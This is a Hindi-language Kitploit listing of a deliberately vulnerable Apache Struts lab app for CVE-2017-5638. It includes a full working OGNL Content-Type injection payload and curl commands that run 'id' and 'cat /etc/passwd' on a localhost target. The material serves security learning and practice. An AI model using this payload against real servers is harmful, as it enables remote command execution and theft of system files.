Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
struts-rce — Apache Struts CVE-2017-5638 RCE शोषण | Kitploit
उपकरण/GitHubGitHub/ggolawski/struts-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubggolawski/struts-rce

struts-rce

Apache Struts CVE-2017-5638 RCE शोषण

रिपॉजिटरी देखें
128 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

:source-highlighter: pygments

= Apache Struts CVE-2017-5638 शोषण

यह सरल वेब एप्लिकेशन कमजोर Apache Struts 2.5.10 (CVE-2017-5638) से बनाया गया है। यह RCE के लिए संवेदनशील है।

== वेब एप्लिकेशन प्रारंभ करना

कमजोर वेब एप्लिकेशन प्रारंभ करने के लिए, निष्पादित करें:

mvn jetty:run

एप्लिकेशन डिफ़ॉल्ट रूप से पोर्ट 8012 पर सुलभ होगा। आप इसे बदल सकते हैं:

mvn -Djetty.http.port= jetty:run

== वेब एप्लिकेशन तक पहुँचना

कमजोर वेब एप्लिकेशन तक पहुँचने के लिए, अपने ब्राउज़र में निम्नलिखित लिंक खोलें: http://127.0.0.1:8012/struts-rce. यदि आपने डिफ़ॉल्ट पोर्ट बदल दिया है, तो लिंक को तदनुसार संशोधित करें।

== वेब एप्लिकेशन का शोषण

इस कमजोरी का उपयोग सर्वर साइड पर मनमाना कमांड चलाने (RCE) के लिए किया जा सकता है। पेलोड Content-Type HTTP हेडर में शामिल है। निम्नलिखित पेलोड id कमांड को निष्पादित करेगा: [source,http]

Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder({'/bin/bash','-c','id'})).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

निम्नलिखित कमांड सर्वर साइड पर id कमांड निष्पादित करेगा: [source,bash]

curl -H "Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder({'/bin/bash','-c','id'})).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://127.0.0.1:8012/struts-rce/index.action

नीचे दिया गया cat /etc/passwd निष्पादित करेगा: [source,bash]

curl -H "Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder({'/bin/bash','-c','cat /etc/passwd'})).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://127.0.0.1:8012/struts-rce/index.action

टूल डाउनलोड करें